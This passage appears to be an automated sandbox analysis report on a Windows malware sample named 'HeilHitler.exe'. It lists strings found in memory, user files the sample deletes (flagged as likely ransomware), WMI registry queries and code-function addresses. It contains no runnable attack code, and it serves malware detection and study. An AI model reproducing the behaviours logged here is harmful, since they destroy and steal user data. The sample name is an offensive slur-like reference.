              Source: HeilHitler.exe, 00000001.00000002.2031419097.000001BD43930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsC
              Source: HeilHitler.exe, 00000001.00000003.1907250502.000001BD43701000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CA4000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CC4000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2019563496.000001BD43701000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
              Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CA4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
              Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43C60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.ca/
              Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43C60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/
              Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43C60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
              Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43C60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
              Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43C60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.fr/
              Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43C7C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
              Source: HeilHitler.exe, 00000000.00000003.1679598819.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1679598819.0000028B9208C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
              Source: HeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CA4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
              Source: HeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CA4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
              Source: HeilHitler.exe, 00000001.00000003.1751574081.000001BD4378F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2018087656.000001BD4374D000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2031849271.000001BD43D0C000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1742219198.000001BD436E7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907001507.000001BD43734000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1756978835.000001BD4374B000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1739607495.000001BD436E7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1733099301.000001BD4378F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2031557342.000001BD43A30000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1749581142.000001BD436E7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1754056720.000001BD436E7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907174052.000001BD43738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: HeilHitler.exe, 00000001.00000003.1723565686.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1730926379.000001BD4367B000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43737000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1720857356.000001BD43737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
              Source: HeilHitler.exe, 00000001.00000003.1741897379.000001BD4379F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1751574081.000001BD4379F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: HeilHitler.exe, 00000001.00000003.1723565686.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1730926379.000001BD4367B000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43737000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718513847.000001BD436DA000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1724146953.000001BD436E7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1720857356.000001BD43737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
              Source: HeilHitler.exe, 00000001.00000003.1741897379.000001BD4379F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1751574081.000001BD4379F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: HeilHitler.exe, 00000001.00000003.1723565686.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43737000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1720857356.000001BD43737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
              Source: HeilHitler.exe, 00000001.00000003.1741897379.000001BD4379F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1751574081.000001BD4379F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: HeilHitler.exe, 00000001.00000003.1718513847.000001BD436DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=b0
              Source: HeilHitler.exe, 00000001.00000003.1754056720.000001BD43709000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1906535342.000001BD43709000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2018689250.000001BD4366B000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1751574081.000001BD437DF000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1750287762.000001BD437DF000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907735236.000001BD43666000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1746940897.000001BD437DF000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2030610587.000001BD4366E000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1733099301.000001BD437E1000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1750052219.000001BD437DF000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2031557342.000001BD43A30000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2030858383.000001BD43709000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2019563496.000001BD43709000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1749581142.000001BD43709000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1742219198.000001BD43709000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907250502.000001BD43709000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1756378160.000001BD437DF000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1739607495.000001BD43709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_c
              Source: HeilHitler.exe, 00000001.00000003.1754056720.000001BD43709000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1749581142.000001BD43709000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1742219198.000001BD43709000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1739607495.000001BD43709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_c0
              Source: HeilHitler.exe, 00000001.00000003.1742219198.000001BD43709000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1739607495.000001BD43709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_c0C
              Source: HeilHitler.exe, 00000001.00000003.1723565686.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1741897379.000001BD4379F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43737000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1751574081.000001BD4379F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1720857356.000001BD43737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: HeilHitler.exe, 00000001.00000002.2030858383.000001BD43709000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2019563496.000001BD43709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_cr
              Source: HeilHitler.exe, 00000001.00000003.1754435836.000001BD4364F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1730926379.000001BD4364F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
              Source: HeilHitler.exe, 00000001.00000003.1742219198.000001BD436E7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1739607495.000001BD436E7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718513847.000001BD436E7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1754435836.000001BD4364F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1724146953.000001BD436E7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1730926379.000001BD4364F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
              Source: HeilHitler.exe, 00000001.00000003.1741897379.000001BD4379F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1751574081.000001BD4379F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: HeilHitler.exe, 00000001.00000002.2032925274.000001BD44538000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
              Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CA4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
              Source: HeilHitler.exe, 00000000.00000003.1679683243.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmp, HeilHitler.exe, 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmp, libssl-1_1.dll.0.dr, libcrypto-1_1.dll.0.drString found in binary or memory: https://www.openssl.org/H
              Source: HeilHitler.exe, 00000000.00000003.1678922666.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://www.python.org/dev/peps/pep-0205/
              Source: HeilHitler.exe, 00000001.00000002.2022974911.000001BD42BF0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
              Source: HeilHitler.exe, 00000001.00000002.2027310965.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1723921949.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1763679896.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717805882.000001BD4348C000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2018427043.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907543224.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717805882.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1750384495.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1723921949.000001BD43498000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1737287565.000001BD434BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
              Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43C7C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
              Source: HeilHitler.exe, 00000001.00000003.1907250502.000001BD43701000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CA4000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CC4000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2019563496.000001BD43701000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
              Source: HeilHitler.exe, 00000001.00000002.2024405519.000001BD43090000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1752805888.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2027310965.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1723921949.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1763679896.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2018427043.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907543224.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717805882.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1750384495.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717535771.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1732575141.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1748948213.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1737287565.000001BD434BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50937
              Source: unknownNetwork traffic detected: HTTP traffic on port 50937 -> 443
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Modifies existing user documents (likely ransomware behavior)
              Source: C:\Users\user\Desktop\HeilHitler.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\ONBQCLYSPU.xlsxJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\KZWFNRXYKI.mp3Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\KZWFNRXYKI.mp3Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\XZXHAVGRAG.docxJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\KATAXZVCPS.pngJump to behavior
              Source: cmd.exeProcess created: 49

              System Summary

              barindex
              Writes or reads registry keys via WMI
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C1D2C0: CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,68_2_00007FF702C1D2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C4B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,68_2_00007FF702C4B57C
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D689E00_2_00007FF633D689E0
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D869640_2_00007FF633D86964
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D610000_2_00007FF633D61000
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D75D300_2_00007FF633D75D30
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D6ACAD0_2_00007FF633D6ACAD
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D6A47B0_2_00007FF633D6A47B
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D864180_2_00007FF633D86418
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D808C80_2_00007FF633D808C8
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D85C000_2_00007FF633D85C00
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D72C100_2_00007FF633D72C10
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D83C100_2_00007FF633D83C10
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D71B500_2_00007FF633D71B50
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D6A2DB0_2_00007FF633D6A2DB
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D7DA5C0_2_00007FF633D7DA5C
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D739A40_2_00007FF633D739A4
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D721640_2_00007FF633D72164
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D719440_2_00007FF633D71944
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D780E40_2_00007FF633D780E4
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D808C80_2_00007FF633D808C8
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D840AC0_2_00007FF633D840AC
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D818740_2_00007FF633D81874
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D698000_2_00007FF633D69800
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D787940_2_00007FF633D78794
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D71F600_2_00007FF633D71F60
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D717400_2_00007FF633D71740
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D897280_2_00007FF633D89728
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D7DEF00_2_00007FF633D7DEF0
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D79EA00_2_00007FF633D79EA0
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D85E7C0_2_00007FF633D85E7C
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D735A00_2_00007FF633D735A0
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D7E5700_2_00007FF633D7E570
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D71D540_2_00007FF633D71D54
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D6A2DB1_2_00007FF633D6A2DB
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D869641_2_00007FF633D86964
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D610001_2_00007FF633D61000
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D75D301_2_00007FF633D75D30
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D6ACAD1_2_00007FF633D6ACAD
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D6A47B1_2_00007FF633D6A47B
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D864181_2_00007FF633D86418
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D808C81_2_00007FF633D808C8
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D85C001_2_00007FF633D85C00
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D72C101_2_00007FF633D72C10
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D83C101_2_00007FF633D83C10
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D71B501_2_00007FF633D71B50
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D7DA5C1_2_00007FF633D7DA5C
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D689E01_2_00007FF633D689E0
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D739A41_2_00007FF633D739A4
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D721641_2_00007FF633D72164
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D719441_2_00007FF633D71944
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D780E41_2_00007FF633D780E4
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D808C81_2_00007FF633D808C8
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D840AC1_2_00007FF633D840AC
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D818741_2_00007FF633D81874
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D698001_2_00007FF633D69800
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D787941_2_00007FF633D78794
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D71F601_2_00007FF633D71F60
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D717401_2_00007FF633D71740
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D897281_2_00007FF633D89728
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D7DEF01_2_00007FF633D7DEF0
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D79EA01_2_00007FF633D79EA0
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D85E7C1_2_00007FF633D85E7C
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D735A01_2_00007FF633D735A0
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D7E5701_2_00007FF633D7E570
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D71D541_2_00007FF633D71D54
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAD618801_2_00007FFDFAD61880
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAE8B3701_2_00007FFDFAE8B370
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAE814511_2_00007FFDFAE81451
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAE8F9051_2_00007FFDFAE8F905
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAE813981_2_00007FFDFAE81398
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF319401_2_00007FFDFAF31940
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAECFEB01_2_00007FFDFAECFEB0
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAE81C991_2_00007FFDFAE81C99
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAE8199C1_2_00007FFDFAE8199C
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAE81A8C1_2_00007FFDFAE81A8C
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAE912301_2_00007FFDFAE91230
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAE8114F1_2_00007FFDFAE8114F
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAE813F21_2_00007FFDFAE813F2
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAE86BB01_2_00007FFDFAE86BB0
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAE815371_2_00007FFDFAE81537
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAEE08801_2_00007FFDFAEE0880
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAE815B41_2_00007FFDFAE815B4
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAE8115E1_2_00007FFDFAE8115E
